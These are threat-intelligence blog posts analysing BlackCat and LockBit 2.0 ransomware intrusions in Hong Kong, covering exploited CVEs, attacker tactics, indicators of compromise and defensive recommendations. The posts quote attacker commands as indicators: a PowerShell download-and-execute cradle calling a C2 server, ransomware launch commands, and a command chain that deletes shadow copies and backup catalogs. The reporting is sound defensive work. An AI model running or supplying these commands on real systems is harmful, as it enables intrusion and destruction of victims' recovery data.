Dark Lab responded to a lesser seen ransomware breed in Hong Kong attributable to ALPHV/BlackCat. We outline the tactics, techniques and procedures of the threat actor, and share our recommendations to ensure readers do not have a cat in hell’s chance of becoming the next victim.

In the second half of 2022, Dark Lab responded to an incident impacting a non-profit professional services organization in Hong Kong. Available evidence suggests that one of the affiliates of the cybercriminal group ALPHV, otherwise known as BlackCat Ransomware-as-a-Service (RaaS), were likely behind the incident.

Reports of BlackCat first emerged in mid-November 2021, and the RaaS group swiftly gained notoriety for their use of the unconventional programming language RUST, their flexibility to self-propagate and target multiple devices and operating systems, and a growing affiliate base with previous links to prolific threat activity groups including DarkSide/BlackMatter and Lockbit 2.0 RaaS programmes.[1] The financially motivated cybercriminal groups’ targets are selected opportunistically rather than with an intent to target specific sectors or geographies but have been observed from their leak site as of 31 August 2022 to have successfully targeted 136 organisations across the United States, Europe, and the Asia Pacific region.

BlackCat is a lesser seen ransomware breed in Hong Kong. However, we posit they may continue to target the region, due to their opportunistic nature and scalability through their affiliate network. In this blog, we will analyse Dark Lab’s recent encounter with BlackCat, their Tactics, Techniques, and Procedures (TTPs), and share insights and recommendations on how to detect and respond to prospective attacks.

Analysis and Exploitation in the wild

Initial Access

Based on the available audit logs, the threat actor likely leveraged a critical remote code execution vulnerability CVE-2019-0708 or BlueKeep in Remote Desktop Services – formerly known as Terminal Services – that affects selected older versions of Windows.[2] To exploit this vulnerability, an unauthenticated attacker would need to send a specially crafted request to the target systems Remote Desktop Service via Remote Desktop Protocol (RDP). An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system, including installing programs; view, change, or delete data; or create new accounts with full user rights.[3] It should be noted that the RDP service itself is not vulnerable.

It was observed over the first three (3) days that the three of five (3 of 5) potentially malicious IP addresses to gain access to the vulnerable workstation in the victim environment, which was exposed to the Internet. The first two IP addresses logged in one day apart, and per various public sources have been flagged as potentially malicious dating back to December 2021.[4] The time spent in the environment was observed to be minimal and no more than a couple of hours combined, with specific execution of the Advanced Port Scanner and Mimikatz observed in the second session. More details will be elaborated in the next section.

Meanwhile, the third IP address was not previously reported to be malicious. The time spent in the environment was increased to almost eight (8) hours, though based on the available audit logs we were unable to ascertain the actions of the threat actor. Notably, the threat actor then remained silent for slightly over one (1) week between the initial login from the third IP address to the subsequent login of the fourth IP address. A fifth IP address was also observed to have logged on to the vulnerable workstation thereafter.

While we are unable to attribute any of those five (5) IP addresses to specific threat actors, we hypothesize that there are two groups of threat actors – the first being an initial access broker as categorized by the first two IP addresses, and the second being the BlackCat affiliate as categorized by the remaining three IP addresses.

Suspected Threat Actor Country Reported MaliciousReported Malicious on OSINT PlatformsDays of AccessReported Malicious on OSINT Platforms
Initial Access BrokerBelizeYesApril 2022Day 15 mins
Initial Access BrokerRussiaYesJune 2022Day 21 hour
BlackCat AffiliateRussiaNoDay 3 7 hours
BlackCat AffiliateUSANoDay 109 hours
BlackCat AffiliateUSANoDay 102 days 4 hours

Through investigation into the user account compromised, we determined that the victim’s device was unknowingly exposed to the Internet due to a multi-homing issue, whereby their device was connected to both the corporate network as well as a standalone network with an external firewall and network configurations and that exposed the device to the Internet. It was further observed that the workstation had not been updated for multiple years, leaving the device unpatched and vulnerable to exploitation.

CVE(s)CVE-2019-0708
First Published Date26 November 2018
CVSS v39.8
Affected VersionsWindows 7, Windows Server 2008 R2, Windows Server 2008 and earlier.
DescriptionA remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability.[5]
Potential ImpactRemote Code Execution Vulnerability enables threat actors to gain initial access and execute the malicious code.
Proof of Concept (PoC) AvailableYes[6]
Exploited in the WildYes[7]
Patch AvailableYes. Update to Windows Server 2012 or above.
We highly recommend installing the latest Windows version for patches against additional unrelated vulnerabilities.
Workaround AvailableMicrosoft[8] has provided potential workarounds:
• Disable Remote Desktop Services if they are not required.
• Enable Network Level Authentication (NLA) on systems running supported editions of the affected Windows versions.
• Block TCP port 3389 at the enterprise perimeter firewall.

Credential Access and Discovery by Suspected Initial Access Broker

We observed the threat actor deployed Advanced Port Scanner[9] to scan the network for open ports on network computers to identify weakened pathways.

The threat actor proceeded to execute Mimikatz[10] to dump the Local Security Authority Server Service (LSASS) process memory and obtain various credentials, including an account with domain administrator rights. This credential was later used for lateral movement.

Handover to Suspected BlackCat Affiliate for Further Discovery and Command & Control

It was observed that the threat actor executed a PowerShell command, Cobalt Strike BEACON (beacon.exe) [11] to initiate a connection with their command-and-control (C2) server, establishing a foothold on the victim network. The C2 enabled remote access to the environment without RDP, as well as further infiltration by leveraging various features provided by the implant.

The threat actor established a connection to a Cobalt Strike Beacon hosted on a public cloud server, potentially to collect their various toolkits by executing this command: powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http:///a’). Subsequently, the threat actor deployed AdFind.exe [12] to perform active directory reconnaissance, enabling them to retrieve a list of accounts within the network.

BlackCat affiliates have been observed in the past to leverage AdFind.exe in conjunction with PowerShell to establish a persistent foothold on a target network, and thereafter downloading and executing malicious payloads.[13] The fact that the threat actor did this only from the fourth and fifth IP instead of the first three IP addresses lends more credence to the hypothesis that we make that the first set of IP addresses were initial access broker.

Lateral Movement

Through their enumeration of the victim’s environment, the threat actor was able to identify their critical systems ideal for targeting, including the domain controller server, back-up servers, and the anti-virus management server. It was observed by the threat actor that the anti-virus management server had no Endpoint Detection and Response (EDR) installed. Selective targeting of critical systems with no EDR coverage is a common practice among sophisticated threat actors as they present an ideal environment for attackers to arbitrate their attack while stealthily evading detection.

Subsequent to identifying the critical systems, the threat actor leveraged the stolen domain administrator account to initiate a remote desktop (RDP) connection. This enabled the threat actor to laterally move from the compromised multihoming workstation to the targeted endpoints due to the flat network environment, as a result of basic or lack of network segmentation in place.

Defense Evasion

It was observed that the threat actor exercised various acts of defense evasion through the use of masquerading tools and lateral movement. A key indicator tying this incident to BlackCat RaaS is the renaming of their tools an evasive manoeuvre often used by BlackCat affiliates to hide their malicious tools and make the process appear as if it is the original Windows svchost process.[14]

Exfiltration

The threat actor proceeded to manually deploy the malware on the anti-virus management server, initiating the self-propagation process whilst deploying rclone.exe[15] to exfiltrate the data to their cloud storage hosted on MEGACloud. Notably, while the New Zealand cloud service, MEGACloud, is a legitimate and trusted platform, it is also a popular service for hackers due to the platform’s unique payment feature allowing users to pay by Bitcoin.[16]

It has been reported by security researchers that BlackCat affiliates leverage rclone.exe to collect and exfiltrate extensive amounts of data from their victim’s network.[17] The threat actor executed the following command to exfiltrate data from the target network: ProgramData\rclone.exe

Impact

The threat actor exercised encryption of the exfiltrated data and executed locker.exe on various endpoints with the following commands:

  • C:\Windows\locker.exe" --child --access-token --verbose
  • C:\Windows\locker.exe" --access-token -v --no-prop-servers \ –propagated

The commands activate the BlackCat payload. Command 2 provides an indicator (“no-props-servers”) that the malware has the capability to self-propagate, but the threat actor strategically targeted critical servers for propagation, omitting servers likely to detect their movements.

It is worth noting that self-propagation is not a common feature of ransomwares. Ultimately, the goal of threat actors is to gain a foothold on a network as quick as possible for exfiltration and extortion. Self-propagation can work against this need for speed, as it requires time in the resource development phase to enumerate the network and select their targets, as well as a manual deployment of the attack. With that said, after the initial deployment the BlackCat ransomware is able to self-propagate, scaling across the network quickly – establishing their foothold whilst evading detection.

Conclusion

BlackCat affiliates work on behalf of the BlackCat group to conduct human-operated ransomware campaigns, opportunistic in nature. With a sophisticated toolkit, various evasion tactics including the RUST-written malware and self-propagating features, BlackCat RaaS poses a significant threat to organisations with conventional security systems. Organisations are encouraged to review the TTPs leveraged by BlackCat affiliates as a result of our recent incident response experience to improve their preventative and detective controls.

Recommendations

As mentioned in the previous blog posts, defending against human-operated ransomware incidents are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop of those already listed in the previous blog post:

  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to defend against human-operated ransomware incidents.
  • Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
  • Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
  • Perform malicious account and group policy creation to identify unauthorized changes and misconfigurations in your organisation’s network environment
  • Regularly perform a review for network and host-based assets for complete stock-taking to identify unpatched or misconfigured devices. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
  • Create a blacklist for the identified indicators of compromise (“IOC”) shared below to enable network-wide blocking and detection of attempted entry or attack and set up ongoing monitoring on the dark web and BlackCat leak site.

In addition, we strongly urge organisations that have deployed the vulnerable versions of Windows operating systems to execute the remediation actions outlined in the blog post, if not already completed. 

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Active Scanning – T1595
  • Gather Victim Identity Information: Credentials – T1589.001
  • Credential Dumping – T1003
  • Account Discovery: Domain Account – T1087.002
  • Valid Accounts – T1078
  • Domain Accounts – T1078.002
  • Command and Scripting Interpreter – T1059
  • External Remote Services – T1133
  • Domain Trust Discovery – T1482
  • Remote System Discovery – T1018
  • Impair Defenses – T1562
  • OS Credential Dumping – T1003
  • File and Directory Discovery – T1083
  • Network Service Discovery – T1046
  • Network Share Discovery – T1135
  • System Information Discovery – T1082
  • Remote Access Software – T1219
  • Data Encrypted for Impact – T1486
  • Service Stop – T1489
  • Web Service – T1102
  • Lateral Tool Transfer – T1570
  • Remote Services – T1021
  • System Services: Service Execution – T1569.002
  • Ingress Tool Transfer – T1105
  • Remote Services: SMB/Windows Admin Shares – T1021.002
  • Exfiltration Over Web Service: Exfiltration to Cloud Storage – T1567.002
  • Transfer Data to Cloud Account – T1537
  • Data Encrypted for Impact – T1486

Indicators of Compromise (IoCs)

IndicatorType
C:\users\kenscchoi\desktop\sharefinder.ps1Script
svchost.exe -connect ip:8443 -pass passwordProcess execution
powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring(“http[:]//ip[:]80/a’))Powershell execution
C:\Users\<user>\Desktop\locker.exe
C:Windows\locker.exe
Executable File
C:\ProgramData\AdFind.exeExecutable File
C:\ProgramData\system\svchost.exeExecutable File
C:\ProgramData\svchost.exeExecutable File
C:\users\<user>\videos\beacon.exeExecutable File
ProgramDataLocalSystem/Upload/beacon.exeExecutable File
SYSVOL\Users\<user>\Videos\beacon.exeExecutable File
C:\admin\.exeExecutable File
C:\windows\users\test\pictures\64\86.exeExecutable File
C:\windows\users\test\pictures\WebBrowserPassView.exeExecutable File
C:\windows\users\test\pictures\PsExec64.exeExecutable File
C:\windows\users\test\pictures\PsExec.exeExecutable File
C:\windows\users\test\pictures\Advanced_Port_Scanner_2.5.3869.exeExecutable File
C:\windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quietCommand Execution

Further information

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Technical analysis of Lockbit 2.0 affiliates’ SonicWall exploit that bypasses MFA  

We outline the tactics, techniques and procedures of the threat actor, and share the technical details of the indicators of compromise for one of our incident response experiences in 1H2022.

In the previous blog post, we reported on the novel technique leveraged by LockBit 2.0 affiliates to  exploit SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSL VPN) appliance to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the multi-factor authentication (MFA) access control. We identified at the point in time from open source internet search engines that over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances.

We follow-up on that blog post with a technical analysis that outlines the LockBit 2.0 affiliates’ Tactics, Techniques and Procedures (TTPs) as observed in our incident response experiences. In addition, we set the scene for our final blog post which will explore the potential factors that enables the LockBit Ransomware-as-a-Service (RaaS) group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Analysis and Exploitation in the wild

Reconnaissance

We observed through analysis on the SSLVPN appliance and firewall network traffic logs that either CVE-2019-7481 or CVE-2021-20028 was exploited twice prior to initial access. The first recorded instance was in late 2021, in which the affiliate obtained the credentials of an administrative account. We conclude this with high confidence given this credential had not been leaked via data breaches or to the Dark Web previously, while the user had adopted a strong password given its length and use of four password complexity character classes.

Over the next three months, each login attempt originated from a unique external IP address and were unsuccessful due to the enforcement of MFA. The exploit was executed again prior to successful initial access, again from a different IP address. The use of a different external IP address each time spread over a sporadic timeframe is a strong indication of likely malicious intent by a threat actor that sought to remain stealthy to avoid detection and triggering of the victim’s incident response protocols.

The list of known malicious IP addresses are listed below, and we posit with high confidence they are utilised by the same threat actor for the following reasons:

  • 91.219.212[.]214 – the first observed exploiting an SQLi vulnerability. This IP address has been reported multiple times as malicious from reputable sources to have conducted suspicious malicious activities, including spam, brute-forcing, web application abuse, and vulnerability exploitation.[1] 
  • 5.206.224[.]246 – the first unsuccessful attempt to login as an administrative user, suggesting that this IP address is associated with 91.219.212[.]214 to obtain and utilise the strong and complex password.
  • 51.91.221[.]111 – which resolves to 213.186.33[.]5 and has been flagged by the security community to be malicious and has served as a command-and-control infrastructure, i.e., Cobalt Strike server.[2]
  • 194.195.91[.]29 – the second observed exploitation of the SQLi vulnerability, with the subsequent login attempt being successful, indicating that the threat actor likely had chained it with the undisclosed zero-day vulnerability.

Initial Access

The threat actor gained access to the victim network by chaining an SQLi vulnerability – one of CVE-2019-7481 or CVE-2021-20028 – with an undisclosed zero-day vulnerability to circumvent the MFA access control of the victim’s SonicWall SRA SSLVPN. Details of the vulnerability chaining are illustrated in the below diagram.

Figure 1 – Holistic vulnerability chaining of SQLi vulnerability with undisclosed post-authentication zero-day vulnerability

Through our systematic method for discovering and analysing attack paths, we were able to replicate the exploited zero-day vulnerability performed by the threat actor. A summary of the undisclosed post-authentication local file inclusion zero-day vulnerability is provided below:

CVE(s)CVE-2022-22279
First Published Date11 March 2022
CVSS v34.9
Affected VersionsSonicWall SMA100 version 9.0.0.9-26sv and earlier.[3]
DescriptionPost-authentication vulnerability that enables threat actors to download the persist.db database on their local device by targeting endpoint’s /cgi-bin/sslvpnclient. extract valid user credentials from the settings.json file, including the username, encrypted passwords, and the TOTP.[4]
Potential ImpactSensitive information disclosure that enables threat actors to circumvent the MFA access control to impersonate valid users and obtain initial access to the victim’s network.
Proof of Concept (PoC) AvailableAt the time of writing, there were no publicly available PoCs identified. DarkLab reported the security vulnerability along with their PoC exploit code to SonicWall’s Product Security Incident Response Team (PSIRT), and on 12 April 2022 observed the release of the advisory acknowledging the vulnerability which we had disclosed.
Exploited in the WildAt the time of writing, this vulnerability is not known to be exploited in the wild.
Patch AvailableNo
Workaround AvailableNo

However, the threat actor required valid user credentials to exploit the post-authentication zero-day vulnerability. Based on this requirement and the victim’s firmware, we identified to two pre-authentication SQLi vulnerabilities – CVE-2019-7841 and CVE-2021-20028 – that the threat actor may have leveraged to obtain a valid session. A summary of these vulnerabilities are provided below:

CVE(s)CVE-2019-7841
First Published Date18 December 2019
CVSS v37.5
Affected VersionsPer SonicWall’s PSIRT, SMA100 version 9.0.0.3 and earlier.[5] However, we noted from a cybersecurity consultancy firm that devices with version 9.0.0.5 firmware and earlier were still vulnerable.[6]
DescriptionPre-authentication SQLi vulnerability in the customerTID parameter which can be exploited remotely. Successful exploitation would allow the threat actor to list active session identifiers for authenticated users in a table named Sessions.[7]
Potential ImpactSensitive information disclosure and initial access under the right conditions (i.e., no MFA access control).
Proof of Concept (PoC) AvailableAt the time of writing, there were no publicly available PoCs identified. However, security researchers have reportedly reproduced the exploit based on samples obtained from in-the-wild exploitation.[8]
Exploited in the WildThis vulnerability has been actively exploited in the wild reportedly since 8 June 2021.[9] SonicWall’s PSIRT published a notification on 13 July 2021 detailing an incident leveraging this vulnerability to perform a targeted ransomware attack.[10]
Patch AvailableYes for organisations running 9.x firmware. No for organisations running unpatched and end-of-life (EOL) 8.x firmware.[11]
Workaround AvailableNo
CVE(s)CVE-2021-20028
First Published Date14 July 2021
CVSS v39.8
Affected VersionsSonicWall SRA appliances running all 8.x firmware, an old version of firmware 9.x (9.0.0.9-26sv or earlier), or version 10.2.0.7.[12] However, we noted from a cybersecurity consultancy firm that devices with version 10.x firmware were potentially vulnerable.[13]
DescriptionPre-authentication SQLi vulnerability in the customerTID parameter which can be exploited remotely. Successful exploitation would allow the threat actor to list active session identifiers for authenticated users in a table named Sessions.[14]
Potential ImpactSensitive information disclosure and initial access under the right conditions (i.e., no MFA access control).
Proof of Concept (PoC) AvailablePer Twitter trails, we understand that the PoC was leaked on paste bins[15] by an alleged DarkSide and LockBit affiliate that goes by the name “Wazawaka” on 25 January 2022.[16] While the leak site is now inaccessible, we noted that security researchers have reportedly reproduced the exploit. [17], [18], and [19]
Exploited in the WildNo known mass exploitation in the wild.
Patch AvailableYes for organisations running 9.x firmware. No for organisations running unpatched and end-of-life (EOL) 8.x firmware.[20]
Workaround AvailableNo

Establishing Persistence

Upon login via the built-in SonicWall SRA SSLVPN administrative account, the threat actor did not require to perform privilege escalation as the threat actor obtained an account which, under the configurations at the time, was integrated with the victim’s Active Directory, and had been assigned domain administrator privileges. Thus, the threat actor cemented their position was to create an Active Directory account “audit” with similar privileges, and proceeded to perform the majority of subsequent malicious activities by leveraging this user.

Discovery

The threat actor transferred the SoftPerfect Network Scanner tool, which is a publicly available network scanner used to discover hostnames and network services, via various network protocols such as Hypertext Transfer Protocol (HTTP), Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), and Secure Shell (SSH).[21] The threat actor was able to launch the scanner to map out the internal network topology and identify additional critical systems.

Filenamenetscan.exe
SHA-256a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789
File typeWin32 EXE
File size16,539,648 bytes

Lateral Movement

Subsequent to identifying the critical systems such as backup servers and the management information system, the threat actor leveraged the stolen administrative account as well as the created account “audit” to initiate a Remote Desktop Connection to access those endpoints.

Defense Evasion

The kavremover tool was staged and executed to disable the endpoint anti-virus solution Kaspersky on the critical systems.[22] This helped to set up the next stage of the campaign, which focuses on the exfiltration of victim data that will later be used for ransom.

Filenamekavremvr.exe
SHA-256c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275
File typeWin32 EXE
File size14,143,976 bytes

In addition, the executable file YDArk.exe was located on selected endpoints. This open source tool was first observed in the wild on 11 June 2020[23], with the commit available on GitHub for download.[24] From public sources, we note that it is a multi-purpose toolkit offered with English and Chinese modules that allow the threat actor to evade defenses through various techniques, including process injection and rootkit.[25] As a result, we posit this tool was downloaded with the intention of disabling the anti-virus solution such as Windows Defender, alongside the kavremover tool.

Exfiltration and Extortion

Initially, the threat actor makes it known to the target network that it has encrypted the network by leaving a ransom note on the impacted systems. In some cases, LockBit affiliates have been observed to stage hacking tools and to exfiltrate data to cloud storage platforms such as AnonFiles that enables users to anonymously access and share contents.[26] and [27]  

Exfiltration and Extortion

Ransomware deployment was observed to have been done manually, with the threat actors executing on the critical servers. Following the execution of Lockbit 2.0, threat actors typically move onto the extortion phase of the campaign, which is broken down into two stages; initial ransom note, and leak website.

FilenameLockBit_9C11F98C309ECD01.exe
SHA-256822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7
File typeWin32 EXE
File size982,528 bytes

We provide a sample of the Lockbit 2.0 ransomware and several behaviours observed in our incident from available logs.

  • The ransomware enumerated connected drives and read the root path of hard drives other than the default C: drive and discovered additional drives connected to the infected system that the ransomware was able to propagate to and encrypt.
  • The ransomware deleted the Volume Shadow Copy Server (VSS), likely by running the following command:
    • C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  • Successfully encrypted files from Lockbit 2.0 had their file extension changed to .lockbit. Unlike typical cases, we did not observe the user background being modified using the \REGISTRY\USER\Control Panel\Desktop\Wallpaper registry

Finally, we observed that all the Active Directory accounts were disabled by the threat actor subsequent to the execution of Lockbit 2.0. In performing this action, legitimate users (e.g., administrators) were inhibited access to accounts, thereby delaying the actions that could be taken to restore the impacted systems and network.

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. Organisations are encouraged to review the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience to improve their preventive and detective controls.

Recommendations

As mentioned in the previous blog post, defending against undisclosed exploits are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop of those already listed in the previous blog post:

  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
  • Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
  • Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as through deployment of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.

In addition, we strongly urge organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN to execute the remediation actions outlined in the previous blog post, if not already completed.  Details can be found here.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Reconnaissance: Active Scanning – Vulnerability Scanning (T1595.002)
  • Reconnaissance: Gather Victim Network Information – IP Addresses (T1590.005)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Persistence: Account Manipulation (T1098)
  • Persistence: Create Account: Domain Account (T1136.002)
  • Privilege Escalation: Domain Accounts (T1078.002)
  • Defense Evasion: Impair Defenses: Disable or Modify Tools (T1562.001)
  • Defense Evasion: Indicator Removal on Host: File Deletion (T1070.004)
  • Credential Access: Credentials from Password Stores (T1555)
  • Discovery: Network Service Scanning (T1046)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Remote System Discovery (T1018)
  • Lateral Movement: Remote Services: Remote Desktop Protocol (T1021.001)
  • Collection: Data from Local System (T1533)
  • Command and Control: Remote File Copy (T1544)
  • Impact: Account Access Removal (T1531)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Inhibit System Recovery (T1490)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

IndicatorType
c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275SHA-256
a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789SHA-256
49bac09d18e35c58180ff08faa95d61f60a22fbb4186c6e8873c72f669713c8cSHA-256
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7SHA-256
91.219.212[.]214IPv4 Address
5.206.224[.]246IPv4 Address
51.91.221[.]111IPv4 Address
213.186.33[.]5IPv4 Address
194.195.91[.]29IPv4 Address
kavremvr.exeExecutable File
netscan.exeExecutable File
LockBit_9C11F98C309ECD01.exeExecutable File
YDArk.exeExecutable File
.lockbitEncrypted Files Extension
Restore-My-Files[.]txtFilename

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA

Increasing Capabilities of LockBit 2.0 Gang Per Our Incident Response Experience in Q1 2022 Impacts Over One Hundred Hong Kong and Macau Organisations; Exploit Acknowledged by SonicWall as CVE-2022-22279

In the first quarter of 2022, DarkLab responded to several ransomware incidents impacting organisations in the financial services, real estate, and manufacturing sectors across Hong Kong, China and Asia Pacific. In all such incidents, the presence of the LockBit executable file, .lockbit extension files, and the StealBit malware suggests that affiliates of the cybercriminal group that operates the LockBit 2.0 Ransomware-as-a-Service (RaaS) was likely behind the incidents.

LockBit 2.0 RaaS is a well-documented group with established tactics, techniques and procedures (TTPs) that has been active since 2019.[1] During our incident response investigations, we found LockBit affiliates exploiting two victims’ SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSLVPN) appliance to establish a foothold in their networks. In the first instance, the affiliate exploited a known SQL injection (SQLi) vulnerability to obtain valid usernames and passwords. Given the multi-factor authentication (MFA) access control was not enabled, they were able to achieve initial access relatively easily. In the second instance, the affiliate performed follow-up actions to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the MFA access control.

In this blog post we will report on their novel technique to exploit SonicWall SSLVPN appliances and bypass MFA. According to results from open source internet search engines, over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances. This exploit disclosed by DarkLab has since been acknowledged by SonicWall as CVE-2022-22279.

A second blog post will then outline the LockBit affiliates’ TTPs as observed in our incident response experience. The final blog post will explore the potential factors that enables the LockBit RaaS group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Initial Access

The typical modus operandi of LockBit 2.0 affiliates is to gain access to a victim network by exploiting known vulnerabilities of public-facing services, including vulnerable SSLVPN. In particular, CVE-2018-13379 [2] has been the preferred vulnerability in many incidents, including those DarkLab responded to in January and February 2022. The vulnerability is several years old, and LockBit 2.0 affiliates were still able to capitalise on the exploit that allows for unauthenticated users to download system files through crafted HTTP resources requests. Other affiliates have been reported to gain initial access by conducting Remote Desktop Protocol (RDP) brute forcing[3] or through purchasing access to compromised servers via underground markets.[4]

However, in two incidents that DarkLab responded to in March 2022 we observed a new infection vector.  Affiliates were observed to exploit a known but relatively obscure SQLi vulnerability – either CVE-2019-7481 [5] or CVE-2021-20028 [6] – in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance to the affiliate’s local endpoint. Retrieved data included valid usernames, passwords, and the TOTP. In doing so, the affiliates could circumvent the MFA access control, impersonate any user to gain initial access, and subsequently deploy ransomware.

Figure 1 – LockBit’s initial attack chain

The latter incidents we responded to in March 2022 were noteworthy for two reasons. First, LockBit affiliates were not reported to have exploited SonicWall SSLVPN products in the past. Second, this was the first publicly observed instance that the known SQLi vulnerability could be exploited by threat actors to extract the TOTP SHA-1 tokens of onboarded users. Affiliates could then generate the QR code containing the required information to generate one time passwords (OTP) in an authenticator app of their choice.[7] This proved to be an innovative way to circumvent the existing MFA access controls. The observation of the exploitation suggests the affiliates of LockBit now have additional tools in their arsenal, and indicates the importance they place in continuous improvement as the group looks to differentiate itself from competitors.

Impact to Hong Kong and Macau

DarkLab replicated and verified the novel exploitation method of the post-authentication vulnerability through internal testing of several known impacted SonicWall SSLVPN firmware. We have shared all relevant details, including the technical exploit code, with the SonicWall Product Security Incident Response Team (PSIRT) in March 2022 to ensure organisations are protected. We will not publicly disclose exact exploitation details to avoid replication by malicious actors.

Per subsequent communications with SonicWall PSIRT, we understood that the upgrades to SonicWall SMA firmware 10.2.0.7-34sv or above, and 9.0.0.10-28sv or above in February 2021 to address CVE-2021-20016 included comprehensive code-strengthening that proactively prevented malicious attackers from exploiting this vulnerability to circumvent the MFA access control.[8] On 12 April 2022, SonicWall PSIRT released the following advisory acknowledging the vulnerability CVE-2022-22279 which we had disclosed.[9]

As of the time of writing, we have not observed from our deep and dark web monitoring any specific intentions by threat actors to leverage this post-authentication vulnerability to target organisations in Hong Kong and Macau. However, we observed that Russian-speaking threat actors had been discussing this vulnerability in early February 2022, with posts from two underground forums – exploit[.]in and xss.[.]is – containing conversation details of purchasing the exploit code and outlining at a high-level the follow-up actions that can be taken to extract the TOTP from the active sessionid

Figure 2 – Screenshot of exploit[.]in underground forum
Figure 3 – Screenshot of xss[.]is underground forum

As a result of the LockBit incidents and various hacker chatter, we were concerned that local organisations may have missed SonicWall PSIRT’s advisory note; after all, we still observed compromises that resulted from the exploitation of CVE-2018-13379 on unpatched Fortinet SSLVPN appliances in February 2022. To that end, we conducted a passive, non-intrusive scan of both CVE-2019-7481 or CVE-2021-20028 on the full Internet Protocol address (IP address) range of Hong Kong and Macau. The preliminary results indicated that at least 100 organisations were vulnerable to CVE-2021-20028, with half of those also vulnerable to CVE-2019-7481.

DarkLab has since proactively contacted dozens of potentially affected organisations to alert them of the potential risks they faced. However, given there were a series of critical vulnerabilities pertaining to SonicWall SSLVPN appliances released in June 2021, it is likely that those may be exploited through other innovative methods by threat actors. For example, the Cybersecurity & Infrastructure Security Agency (CISA) listed CVE-2021-20016 as another SQLi vulnerability that allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information in SMA100 build version 10.x. [10], which aligned with our communication with SonicWall’s PSIRT. We foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability.

CVE NumberProductVulnerability NameDate Added to CatalogueShort Description
CVE-2021-20021SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
CVE-2021-20022SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to upload an arbitrary file to the remote host.
